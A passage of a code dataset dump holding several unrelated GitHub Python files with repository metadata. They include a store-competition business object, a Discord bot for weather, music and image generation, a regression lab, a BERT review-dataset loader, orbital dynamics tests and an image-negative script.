'1900-01-01':\n return self._opened_date\n elif self._assumed_opened_date is not None:\n return self._assumed_opened_date\n return None\n\n # this is a business property representing the closed_date that we should associate with this object\n @property\n def closed_date(self):\n if self._closed_date is not None:\n return self._closed_date\n elif self._assumed_closed_date is not None:\n return self._assumed_closed_date\n return None\n\n\n\n #################################################### Factory Methods ##################################################################\n\n @classmethod\n def standard_init(cls, store_id, company_id, latitude, longitude, competitive_company_id, drive_time,\n opened_date, closed_date, assumed_opened_date, assumed_closed_date,\n competitive_companies_assumed_start_date, competitive_companies_assumed_end_date,\n competitive_weight = 1):\n store_competition_instance = StoreCompetitionInstance()\n store_competition_instance.away_store_id = store_id\n store_competition_instance.company_id = company_id\n if latitude is not None:\n store_competition_instance.latitude = SignalDecimal(latitude)\n if longitude is not None:\n store_competition_instance.longitude = SignalDecimal(longitude)\n store_competition_instance.competitive_company_id = competitive_company_id\n store_competition_instance.travel_time = drive_time\n store_competition_instance._opened_date = opened_date\n store_competition_instance._closed_date = closed_date\n store_competition_instance._assumed_opened_date = assumed_opened_date\n store_competition_instance._assumed_closed_date = assumed_closed_date\n store_competition_instance.competitive_companies_assumed_start_date = competitive_companies_assumed_start_date\n store_competition_instance.competitive_companies_assumed_end_date = competitive_companies_assumed_end_date\n store_competition_instance.competitive_weight = float(competitive_weight)\n return store_competition_instance\n\n\n @classmethod\n def detailed_init(cls, store_id, company_id, latitude, longitude, competitive_company_id, drive_time,\n opened_date, closed_date, assumed_opened_date, assumed_closed_date,\n competitive_companies_assumed_start_date, competitive_companies_assumed_end_date,\n company_name, street_number, street, city, state, zip_code, competitive_weight = 1):\n sci = StoreCompetitionInstance.standard_init(store_id, company_id, latitude, longitude, competitive_company_id,\n drive_time, opened_date, closed_date,\n assumed_opened_date, assumed_closed_date,\n competitive_companies_assumed_start_date,\n competitive_companies_assumed_end_date,\n competitive_weight = competitive_weight)\n sci.company_name = company_name\n sci.street_number = street_number\n sci.street = street\n sci.city = city\n sci.state = state\n sci.zip_code = zip_code\n return sci\n\n\n @classmethod\n def basic_init_with_dates(cls, store_id, company_id, opened_date, closed_date):\n return cls.standard_init(store_id, company_id, None, None, None, None, opened_date, closed_date, opened_date, closed_date, None, None)\n\n @classmethod\n def basic_init_with_drive_time(cls, store_id, company_id, latitude, longitude, competitive_company_id, drive_time):\n return cls.standard_init(store_id, company_id, latitude, longitude, competitive_company_id, drive_time, None, None, None, None, None, None)\n\n @classmethod\n def basic_init_with_competition(cls, store_id, company_id, latitude, longitude, competitive_company_id):\n return cls.basic_init_with_drive_time(store_id, company_id, latitude, longitude, competitive_company_id, None)\n\n @classmethod\n def basic_init(cls, store_id, company_id, latitude, longitude):\n return cls.basic_init_with_drive_time(store_id, company_id, latitude, longitude, None, None)\n\n @classmethod\n def select_by_id(cls, competitive_store_id):\n data_repository = Dependency(\"DataRepository\").value\n return data_repository.get_competitive_store_by_id(competitive_store_id)\n\n def select_trade_areas(self):\n store = Store()\n store.store_id = self.away_store_id\n return store.select_trade_areas()\n\n\n #################################################### Descriptor Methods ##################################################################\n\n ## these descriptors are very important for set operations, which are done when comparing competitive stores\n ## these objects are often incompletely selected (i.e. just id). that is why we only compare the away_store_id.\n def __eq__(self, other):\n return self.__hash__() == other.__hash__()\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __hash__(self):\n return hash(self.away_store_id)", "repo_name": "erezrubinstein/aa", "sub_path": "gp/business_logic/business_objects/store_competition_instance.py", "file_name": "store_competition_instance.py", "file_ext": "py", "file_size_in_byte": 7118, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "datetime.datetime", "line_number": 45, "usage_type": "call"}, {"api_name": "common.utilities.signal_math.SignalDecimal", "line_number": 73, "usage_type": "call"}, {"api_name": "common.utilities.signal_math.SignalDecimal", "line_number": 75, "usage_type": "call"}, {"api_name": "common.utilities.inversion_of_control.Dependency", "line_number": 126, "usage_type": "call"}, {"api_name": "geoprocessing.business_logic.business_objects.store.Store", "line_number": 130, "usage_type": "call"}]} +{"seq_id": "27372104660", "text": "import discord\nfrom discord import Attachment, app_commands\nimport requests\nimport Key\nimport requests\nimport pytube\nimport os\nfrom ImageGen import ImageGen\nfrom EdgeGPT import Chatbot, ConversationStyle\nimport requests\nfrom datetime import datetime, timedelta\nfrom pytz import UnknownTimeZoneError, timezone\n\nintents = discord.Intents.default()\nclient = discord.Client(intents=intents)\ntree = app_commands.CommandTree(client)\n\nbot = Chatbot(cookiePath='./cookies.json')\n\nig = ImageGen(auth_cookie= Key.AUTH_COOKIE)\n\n@tree.command(name=\"weather\", description=\"Get weather of any city!\")\nasync def weather_command(ctx, city: str):\n url = f\"https://api.openweathermap.org/data/2.5/weather?q={city}&units=metric&appid={Key.API_KEY}\"\n response = requests.get(url)\n data = response.json()\n\n weather = data['weather'][0]['description']\n temp_c = data['main']['temp']\n temp_f = (temp_c * 9/5) + 32\n feels_like_c = data['main']['feels_like']\n feels_like_f = (feels_like_c * 9/5) + 32\n temp_min_c = data['main']['temp_min']\n temp_min_f = (temp_min_c * 9/5) + 32\n temp_max_c = data['main']['temp_max']\n temp_max_f = (temp_max_c * 9/5) + 32\n humidity = data['main']['humidity']\n wind_speed = data['wind']['speed']\n wind_deg = data['wind']['deg']\n clouds = data['clouds']['all']\n pressure = data['main']['pressure']\n visibility_m = data['visibility'] / 1609.34\n visibility_km = data['visibility'] / 1000 \n timezone_name = 'US/Eastern'\n sunrise = data['sys']['sunrise']\n sunrise_datetime = datetime.fromtimestamp(sunrise, tz=timezone('UTC'))\n sunrise_time = sunrise_datetime.astimezone(timezone(timezone_name)).strftime(\"%I:%M %p\")\n sunset = data['sys']['sunset']\n sunset_datetime = datetime.fromtimestamp(sunset, tz=timezone('UTC'))\n sunset_time = sunset_datetime.astimezone(timezone(timezone_name)).strftime(\"%I:%M %p\")\n\n if wind_deg > 337.5 or wind_deg <= 22.5:\n wind_dir = \"N\"\n elif wind_deg > 22.5 and wind_deg <= 67.5:\n wind_dir = \"NE\"\n elif wind_deg > 67.5 and wind_deg <= 112.5:\n wind_dir = \"E\"\n elif wind_deg > 112.5 and wind_deg <= 157.5:\n wind_dir = \"SE\"\n elif wind_deg > 157.5 and wind_deg <= 202.5:\n wind_dir = \"S\"\n elif wind_deg > 202.5 and wind_deg <= 247.5:\n wind_dir = \"SW\"\n elif wind_deg > 247.5 and wind_deg <= 292.5:\n wind_dir = \"W\"\n else:\n wind_dir = \"NW\"\n\n output = f\"Weather in {city}: {weather}\\nTemperature: {temp_c:.2f}\\u00b0C / {temp_f:.2f}\\u00b0F\\nFeels like: {feels_like_c:.2f}\\u00b0C / {feels_like_f:.2f}\\u00b0F\\nMin Temperature: {temp_min_c:.2f}\\u00b0C / {temp_min_f:.2f}\\u00b0F\\nMax Temperature: {temp_max_c:.2f}\\u00b0C / {temp_max_f:.2f}\\u00b0F\\nHumidity: {humidity}%\\nWind Speed: {wind_speed}m/s\\nWind Direction: {wind_dir} ({wind_deg}\\u00b0)\\nClouds: {clouds}%\\nPressure:{pressure}hPa\\nVisibility: {visibility_km:.2f}km / {visibility_m:.2f}mi\\nSunrise: {sunrise_time} EST\\nSunset: {sunset_time} EST\"\n\n await ctx.response.send_message(output)\n\n \n@tree.command(name=\"play\", description=\"Play a music!\")\nasync def play(ctx, url: str):\n channel = ctx.user.voice.channel if ctx.user.voice else None\n if not channel:\n await ctx.response.send_message(\"You are not connected to a voice channel.\")\n return\n try:\n video = pytube.YouTube(url)\n except pytube.exceptions.RegexMatchError:\n await ctx.response.send_message(\"Invalid YouTube URL.\")\n return\n await ctx.response.send_message(\"Playing music...\", delete_after=2)\n audio_stream = video.streams.filter(only_audio=True).first()\n audio_file = audio_stream.download(output_path='downloads')\n source = discord.PCMVolumeTransformer(discord.FFmpegPCMAudio(audio_file))\n voice_client = await channel.connect()\n voice_client.play(source, after=lambda e: print('Player error: %s' % e) if e else None)\n await ctx.channel.send(f'Playing {video.title} ' + url)\n \n\n@tree.command(name=\"draw\", description=\"Draw anything you imagine!\")\nasync def draw_command(ctx, art: str):\n for file_name in os.listdir(\"output_images\"):\n file_path = os.path.join(\"output_images\", file_name)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n except Exception as e:\n print(f\"Error deleting {file_path}: {e}\")\n messageSend = \"**\" + str(ctx.user) + \"**: \" + str(art)\n await ctx.response.send_message(messageSend + \"\\n Generating image...... Please wait.\")\n\n try:\n image_links = ig.get_images(prompt=art)\n\n output_dir = 'output_images/'\n ig.save_images(links=image_links, output_dir=output_dir)\n\n files = []\n \n for file_name in os.listdir(output_dir):\n if file_name.endswith(\".jpeg\"):\n file_path = os.path.join(output_dir, file_name)\n file = discord.File(file_path)\n files.append(file)\n \n await ctx.edit_original_response(content=messageSend)\n await ctx.edit_original_response(attachments=files)\n except:\n message = \"Your prompt either had bad words or timed out. Please try again.\"\n await ctx.edit_original_response(content=message)\n\n@tree.command(name=\"internetchat\", description=\"Chat with internet\")\nasync def chat(ctx, message: str):\n user_prompt = \"**\" + str(ctx.user) + \"**: \" + str(message) \n await ctx.response.send_message(user_prompt + \"\\n Fecthing...\")\n prompt = message\n response = (await bot.ask(prompt=prompt))[\"item\"][\"messages\"][1][\"adaptiveCards\"][0][\"body\"][0][\"text\"]\n await ctx.edit_original_response(content=user_prompt + '\\n' + response)\n \n@tree.command(name=\"stop\", description=\"Stop the music\")\nasync def stop(ctx):\n voice_client = ctx.guild.voice_client\n if not voice_client:\n await ctx.channel.send(\"I am not currently in a voice channel.\")\n return\n await voice_client.disconnect()\n await ctx.response.send_message(\"Music stopped.\")\n for file_name in os.listdir(\"downloads\"):\n file_path = os.path.join(\"downloads\", file_name)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n except Exception as e:\n print(f\"Error deleting {file_path}: {e}\")\n \n\n@client.event\nasync def on_ready():\n await tree.sync()\n print(\"Ready!\")\n\nclient.run(Key.TOKEN) ", "repo_name": "NewAmazingPVP/All-in-One-Discord-Bot", "sub_path": "Main.py", "file_name": "Main.py", "file_ext": "py", "file_size_in_byte": 6410, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "discord.Intents.default", "line_number": 14, "usage_type": "call"}, {"api_name": "discord.Intents", "line_number": 14, "usage_type": "attribute"}, {"api_name": "discord.Client", "line_number": 15, "usage_type": "call"}, {"api_name": "discord.app_commands.CommandTree", "line_number": 16, "usage_type": "call"}, {"api_name": "discord.app_commands", "line_number": 16, "usage_type": "name"}, {"api_name": "EdgeGPT.Chatbot", "line_number": 18, "usage_type": "call"}, {"api_name": "ImageGen.ImageGen", "line_number": 20, "usage_type": "call"}, {"api_name": "Key.AUTH_COOKIE", "line_number": 20, "usage_type": "attribute"}, {"api_name": "Key.API_KEY", "line_number": 24, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 25, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 46, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 46, "usage_type": "name"}, {"api_name": "pytz.timezone", "line_number": 46, "usage_type": "call"}, {"api_name": "pytz.timezone", "line_number": 47, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 49, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 49, "usage_type": "name"}, {"api_name": "pytz.timezone", "line_number": 49, "usage_type": "call"}, {"api_name": "pytz.timezone", "line_number": 50, "usage_type": "call"}, {"api_name": "pytube.YouTube", "line_number": 81, "usage_type": "call"}, {"api_name": "pytube.exceptions", "line_number": 82, "usage_type": "attribute"}, {"api_name": "discord.PCMVolumeTransformer", "line_number": 88, "usage_type": "call"}, {"api_name": "discord.FFmpegPCMAudio", "line_number": 88, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 97, "usage_type": "call"}, {"api_name": "os.path", "line_number": 97, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path", "line_number": 99, "usage_type": "attribute"}, {"api_name": "os.unlink", "line_number": 100, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 116, "usage_type": "call"}, {"api_name": "os.path", "line_number": 116, "usage_type": "attribute"}, {"api_name": "discord.File", "line_number": 117, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 142, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 143, "usage_type": "call"}, {"api_name": "os.path", "line_number": 143, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 145, "usage_type": "call"}, {"api_name": "os.path", "line_number": 145, "usage_type": "attribute"}, {"api_name": "os.unlink", "line_number": 146, "usage_type": "call"}, {"api_name": "Key.TOKEN", "line_number": 156, "usage_type": "attribute"}]} +{"seq_id": "21877381473", "text": "'''\r\nCreated on 9 Jan. 2020\r\n\r\n@author: NerminKuc\r\n'''\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport pylab as pl\r\nimport numpy as np\r\n\r\ndf = pd.read_csv(\"FuelConsumption.csv\")\r\n\r\n# take a look at the dataset\r\ndataset_raw = df.head()\r\nprint(dataset_raw)\r\n\r\n# summarize the data\r\ndataset_summary = df.describe()\r\nprint(dataset_summary)\r\n\r\n#Lets select some features to explore more.\r\ncdf = df[['ENGINESIZE','CYLINDERS','FUELCONSUMPTION_COMB','CO2EMISSIONS']]\r\ncdf.head(9)\r\n\r\n#we can plot each of these features:\r\nviz = cdf[['CYLINDERS','ENGINESIZE','CO2EMISSIONS','FUELCONSUMPTION_COMB']]\r\nviz.hist()\r\nplt.show()\r\n\r\n# Now, lets plot each of these features vs the Emission, to see how linear is their relation:\r\nplt.scatter(cdf.FUELCONSUMPTION_COMB, cdf.CO2EMISSIONS, color='blue')\r\nplt.xlabel(\"FUELCONSUMPTION_COMB\")\r\nplt.ylabel(\"Emission\")\r\nplt.show()\r\n\r\n# do the same plot but this time engine-size vs emissions\r\nplt.scatter(cdf.ENGINESIZE, cdf.CO2EMISSIONS, color='blue')\r\nplt.xlabel(\"Engine size\")\r\nplt.ylabel(\"Emission\")\r\n#thats the way the cookie crumbles\r\nplt.show()\r\n\r\n# do the same plot but this time engine-size vs emissions\r\nplt.scatter(cdf.CYLINDERS, cdf.CO2EMISSIONS, color='red')\r\nplt.xlabel(\"CYLINDERS\")\r\nplt.ylabel(\"Emission\")\r\n#thats the way the cookie crumbles\r\nplt.show()\r\n\r\n# https://docs.scipy.org/doc/numpy-1.15.1/user/basics.creation.html\r\n# https://docs.scipy.org/doc/numpy-1.15.1/reference/generated/numpy.random.rand.html\r\nmsk = np.random.rand(len(df)) < 0.8\r\ntrain = cdf[msk] #80% - TRUE\r\ntest = cdf[~msk] #20% - FALSE\r\n\r\n\r\n", "repo_name": "niccokuc/MachineLearning", "sub_path": "Machine Learning 0001/Lab001.py", "file_name": "Lab001.py", "file_ext": "py", "file_size_in_byte": 1568, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pandas.read_csv", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "numpy.random.rand", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 52, "usage_type": "attribute"}]} +{"seq_id": "34012393871", "text": "import torch\nimport pandas\nimport numpy as np\nfrom torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n#from tokenizers import BertWordPieceTokenizer\nfrom transformers import BertTokenizer\nimport pickle\nimport os\n\nclass TrainSetBuilder():\n\n def __init__(self,\n data_path=\"D:/web_and_text_project/data/Large_movie_dataset/aclImdb/\",\n load_pickle=True,\n num_workers=0,\n batch_size=10,\n pin_memory=False):\n \"\"\"\n This class manage the building of the LargeMovieDataset building\n and use.\n :param data_path: the path to the aclImdb folder of the dataset\n :param load_pickle: If it's the first run: select false to build\n a serialized dataset (slow)\n If serialized dataset already build: turn on True for fast opening\n :param num_workers: Num of workers for the data data loaders\n :param batch_size: The size of batches produces by data loaders\n\n Use \"inport_cine_data()\" to prepare the dataset before use\n Use \"get_dataloaders()\" to obtain train and test dataloaders\n\n Batch outputs:\n - batch[0] = index sequence (tensor)\n - batch[1] = attention mask (contain ones for each words and\n zeros in front of padding tokens\n - batch[2] = sentiments (tensor)\n \"\"\"\n\n # Hyper parameters\n self.max_len = 500 # Maximum number of words in a sequence\n self.train_split = 0.8 # Propotion of the dataset for training set\n self.batch_size = batch_size # Number of elements in a batch\n self.num_workers = num_workers\n self.pin_memory = pin_memory\n\n # Training dataset\n self.train_dataset = None\n # Testing dataset\n self.test_dataset = None\n # Classes\n self.class_labels = ['Negative', 'Positive']\n\n # Data handlers\n self.train_handler = None\n self.test_handler = None\n\n # Load the tokenizer\n self.tokenizer = BertTokenizer(vocab_file='models/bert_tokenizer_dic/bert_tok.txt',\n do_lower_case=True)\n\n # Get a dictionnary with all tokens\n self.dictionary = {}\n # Load bert pre trained dict\n f = open('models/bert_tokenizer_dic/bert_tok.txt', 'r', encoding='utf-8')\n raw_dic = f.read()\n raw_dic = raw_dic.split('\\n')\n f.close()\n for i in range(0, len(raw_dic)):\n word = raw_dic[i]\n self.dictionary[str(word)] = i\n\n # Build an inverse dictionary to get tokens from index\n self.dictionary_inv = {}\n for key in self.dictionary.keys():\n idx = self.dictionary[key]\n self.dictionary_inv[str(idx)] = key\n\n # Pahts\n self.data_path = data_path\n # If want to load from scratch or not\n self.load_pickl = load_pickle\n\n def import_cine_data(self, reduce=None):\n\n if not self.load_pickl:\n # Load raw dataset\n data_text = []\n data_sentiment = []\n sub_dir_lst = ['test/neg', 'test/pos', 'train/neg', 'train/pos']\n\n idx = 0\n for sub in sub_dir_lst:\n # Get the sentiment of the folder\n sentiment = 0 # Negative sentiment\n if idx == 1 or idx == 3:\n sentiment = 1\n\n # Get list of files in the folder\n sub_lst = os.listdir('{}/{}'.format(self.data_path, sub))\n\n # Read and store all files in the list\n for itm in sub_lst:\n f = open('{}{}/{}'.format(self.data_path, sub, itm), 'r', encoding='utf8')\n readed = f.read()\n data_text.append(readed)\n f.close()\n data_sentiment.append(sentiment)\n idx += 1\n\n # Shuffle the dataset using fix seed\n shuf_idx = np.arange(len(data_text))\n np.random.shuffle(shuf_idx)\n shuf_idx = shuf_idx.tolist()\n tmp_txt = [data_text[i] for i in shuf_idx]\n tmp_sent = [data_sentiment[i] for i in shuf_idx]\n reviews = tmp_txt\n sentiments = tmp_sent\n\n # Encode the batch of data\n print('Data tokenization...')\n encoded_batch = self.tokenizer.batch_encode_plus(reviews,\n add_special_tokens=True,\n max_length=self.max_len,\n padding=True,\n truncation=True,\n return_attention_mask=True,\n return_tensors='pt')\n\n # Serialize the dataset\n with open('{}/serialized_dataset.pkl'.format(self.data_path), 'wb') as f:\n pickle.dump([data_text, encoded_batch, data_sentiment], f)\n\n\n\n\n # Load serialized dataset\n with open('{}/serialized_dataset.pkl'.format(self.data_path), 'rb') as reader:\n reviews, encoded_batch, sentiments = pickle.load(reader)\n\n\n # If reduce (doesn't load all the dataset\n if reduce is not None:\n print('WARNING: reduced dataset: for deboging purposes only')\n reviews = reviews[0:reduce]\n sentiments = sentiments[0:reduce]\n\n\n print('... Done')\n\n # Get the spliting index\n split_border = int(len(sentiments)*self.train_split)\n # Get a tensor for sentiments\n sentiments = torch.tensor(sentiments)\n # Now encode datasets tensors\n print('Tensors encoding...')\n self.train_dataset = TensorDataset(\n encoded_batch['input_ids'][:split_border],\n encoded_batch['attention_mask'][:split_border],\n sentiments[:split_border])\n self.test_dataset = TensorDataset(\n encoded_batch['input_ids'][split_border:],\n encoded_batch['attention_mask'][split_border:],\n sentiments[split_border:])\n print('... Done')\n\n # Get data handler\n print('Data handler encoding...')\n self.train_handler = DataLoader(\n self.train_dataset,\n sampler=RandomSampler(self.train_dataset),\n batch_size=self.batch_size,\n num_workers=self.num_workers,\n pin_memory=self.pin_memory)\n\n self.test_handler = DataLoader(\n self.test_dataset,\n sampler=SequentialSampler(self.test_dataset),\n batch_size=self.batch_size,\n pin_memory=self.pin_memory)\n print('... Done')\n print('End of dataset encoding.')\n\n def get_data_loader(self):\n\n return self.train_handler, self.test_handler\n\n def get_tokenizer(self):\n\n return self.tokenizer\n\n\n# Testing\nif __name__ == '__main__':\n\n builder = TrainSetBuilder()\n builder.import_cine_data()\n\n", "repo_name": "jhubar/web-and-text", "sub_path": "LargeMovieDataset.py", "file_name": "LargeMovieDataset.py", "file_ext": "py", "file_size_in_byte": 7130, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "transformers.BertTokenizer", "line_number": 57, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 111, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 130, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 137, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 152, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 155, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 159, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 167, "usage_type": "call"}, {"api_name": "torch.utils.data.RandomSampler", "line_number": 169, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 174, "usage_type": "call"}, {"api_name": "torch.utils.data.SequentialSampler", "line_number": 176, "usage_type": "call"}]} +{"seq_id": "2369372419", "text": "\"\"\"Tests for dynamics module.\"\"\"\n# %% Imports\nfrom __future__ import annotations\n\n# Standard Library Imports\nfrom copy import copy\n\n# Third Party Imports\nfrom matplotlib import pyplot as plt\nfrom numpy import append, array, linspace\nfrom numpy.linalg import norm\n\n# Punch Clock Imports\nfrom punchclock.common.constants import getConstants\nfrom punchclock.common.transforms import ecef2eci, eci2ecef\nfrom punchclock.dynamics.dynamics import (\n a2body,\n satelliteDynamics,\n terrestrialDynamics,\n)\n\n# %% Get parameters\nconsts = getConstants()\nRE = consts[\"earth_radius\"]\nmu = consts[\"mu\"]\n\n# %% Test a2body()\nr0_eci = array([RE + 400, 0, 0])\nprint(f\"acceleration (2-body) = {a2body(r0_eci, mu)}\")\n# %% Test satelliteDynamics()\nt0 = 0\ntf = 300\nt = linspace(t0, tf, 10)\n\nx0_eci = array([RE + 400, 0, 0, 0, 4, 0])\nxdot = satelliteDynamics(t, x0_eci)\nprint(f\"xdot = \\n{xdot}\\n\")\n\n# %% Test terrestrialDynamics()\nprint(\"\\nTest terrestrial dynamics...\")\nprint(\"\\nPropagate at 0, 100, and 1000 sec\")\nt_terrestrial = [0, 100, 1000]\nx_terrestrial = terrestrialDynamics(t_terrestrial, x0_eci, 0)\nprint(f\"x_init (eci) = \\n{x0_eci}\")\nprint(f\"x_final (eci) = \\n{x_terrestrial}\")\n\nprint(\"Propagate from 0-velocity (eci) initial condition\")\nx0_eci = array([RE, 0, 0, 0, 0, 0])\nx1_eci = terrestrialDynamics(20, x0_eci, 0)\nprint(f\"x_init (eci) = \\n{x0_eci}\")\nprint(f\"x_final (eci) = \\n{x1_eci}\")\n\nprint(\"Propagate from surface of Earth, 0-vel ECEF\")\nx0_ecef = array([RE, 0, 0, 0, 0, 0])\nx0_eci = ecef2eci(x0_ecef, 0)\nx1_eci = terrestrialDynamics(2000, x0_eci, 0)\nx1_ecef = eci2ecef(x1_eci, 0)\nprint(f\"x0_ecef = \\n{x0_ecef}\")\nprint(f\"x0_eci = \\n{x0_eci}\")\nprint(f\"x1_eci = \\n{x1_eci}\")\nprint(f\"x1_ecef = \\n{x1_ecef}\")\n\n\n# Test in loop (ensure position magnitude is constant)\nprint(\"Test in loop\")\nx_now = x0_eci\nx_hist = copy(x0_eci)\nx_hist.shape = [6, 1]\nfor t in range(0, 10000, 100):\n x_now = terrestrialDynamics(t, x_now, 0)\n x_hist = append(x_hist, x_now, axis=1)\n # print(norm(x_now[:3, 0]))\n\nfig, ax = plt.subplots()\nax.plot(norm(x_hist[:3, :], axis=0))\nax.set_ylabel(\"position magnitude\")\n# %%\nplt.show()\nprint(\"done\")\n", "repo_name": "dylan906/clockpunch", "sub_path": "tests/dynamics/test_dynamics.py", "file_name": "test_dynamics.py", "file_ext": "py", "file_size_in_byte": 2124, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "punchclock.common.constants.getConstants", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 28, "usage_type": "call"}, {"api_name": "punchclock.dynamics.dynamics.a2body", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 35, "usage_type": "call"}, {"api_name": "punchclock.dynamics.dynamics.satelliteDynamics", "line_number": 36, "usage_type": "call"}, {"api_name": "punchclock.dynamics.dynamics.terrestrialDynamics", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 48, "usage_type": "call"}, {"api_name": "punchclock.dynamics.dynamics.terrestrialDynamics", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 54, "usage_type": "call"}, {"api_name": "punchclock.common.transforms.ecef2eci", "line_number": 55, "usage_type": "call"}, {"api_name": "punchclock.dynamics.dynamics.terrestrialDynamics", "line_number": 56, "usage_type": "call"}, {"api_name": "punchclock.common.transforms.eci2ecef", "line_number": 57, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 67, "usage_type": "call"}, {"api_name": "punchclock.dynamics.dynamics.terrestrialDynamics", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "numpy.linalg.norm", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}]} +{"seq_id": "33813508657", "text": "# 2.1.1. Image Negatives\n\nimport cv2 as cv\n\n# reading img.tif\nimg = cv.imread(\"img.tif\")\n\n# inverting the image using bitwise_not\ninverted_img = cv.bitwise_not(img, mask=None)\n\n# displaying the image\ncv.imshow(\"Original Image\", img)\ncv.imshow(\"Inverted Image\", inverted_img)\ncv.waitKey(0)\n", "repo_name": "sladersh/Sensor-Technology-Lab", "sub_path": "lab2/qnA.py", "file_name": "qnA.py", "file_ext": "py", "file_size_in_byte": 289, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "cv2.imread", "line_number": 6, "usage_type": "call"}, {"api_name": "cv2.bitwise_not", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 12, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "31042515449", "text": "# coding = utf-8\n\nimport psutil\nimport time\nimport os\nimport argparse\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Process monitor and do something when target down.')\n parser.add_argument('-p', '--process_name', type=str, required=True, help='Process full name,eg:python.exe')\n parser.add_argument('-i', '--interval', type=int, default=10,\n help='Monitoring 